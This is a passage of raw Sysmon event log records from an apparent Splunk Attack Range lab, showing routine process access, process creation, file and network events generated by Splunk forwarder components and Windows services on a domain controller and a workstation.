Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103001Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.604{58E9C193-B1AF-615A-B601-00000000FC01}6328C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103000Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=153E8A5DCBB75987F5E9EF4DC26FE3A8,SHA256=658BCACEFE384106DF0CADEF52177848F7BBB22D04E7C2F6DC459E1451266083,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080919Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B1AF-615A-3301-00000000FD01}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080918Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080917Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080916Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080915Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080914Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080913Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080912Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080911Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080910Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080909Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B1AF-615A-3301-00000000FD01}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080908Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.084{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B1AF-615A-3301-00000000FD01}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000080907Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:59.085{2FDD8D40-B1AF-615A-3301-00000000FD01}2452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000102999Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.338{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-AE66-615A-BC00-00000000FC01}4464C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000102998Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.228{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49488-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000102997Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:58.228{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49488-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x8000000000000000102996Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.041{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=305AA7B379167F136DD5294ED97729F9,SHA256=EC7787A73A4BF303D0B7BE50711AEFF27B308D0B844262A8CBBC59194317B233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000102995Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:47:59.041{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FF5EB65D0E99EBD3CECD566686C4FC6,SHA256=E1FA8603682047EF9F14F15F57C2342AFEEFCEB7E4566394880588E0B76DEDB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080924Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:00.881{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4DCF32890832EC849872261F6F03CAF8,SHA256=BB17B9F351C6E6B23B6EAC423F1098BC39AD9E84093FF7CAB1330FEEF36D186A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103019Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.635{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=305AA7B379167F136DD5294ED97729F9,SHA256=EC7787A73A4BF303D0B7BE50711AEFF27B308D0B844262A8CBBC59194317B233,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103018Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.557{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1193BFCD42D8BB28F92408609CB40FF9,SHA256=D54300B3EE4E89383C8F0B7B937ACE8D89A0F01EA7892ECE849E24D9788B6F0C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000080923Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:47:57.745{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local49992-false10.0.1.12-8000- 23542300x800000000000000080922Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:00.209{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D203D84B6327833ACAC80E971E510B05,SHA256=E7219B9305A68E7E24D54E7CEFDD93AF7E2DB8FD85430E0169FE09A9E21BB9CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080921Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:48:00.209{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6D62178FAE56BDDA1589987A752027F4,SHA256=DEEE4E91784DE805132AF07436949B7A0AF47B8883C0EB598631C88E5E4CB250,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103017Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B1B0-615A-B701-00000000FC01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103016Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103015Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103014Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103013Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103012Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACA4-615A-0500-00000000FC01}412528C:\Windows\system32\csrss.exe{58E9C193-B1B0-615A-B701-00000000FC01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:48:00.338{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B1B0-615A-B701-00000000FC01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 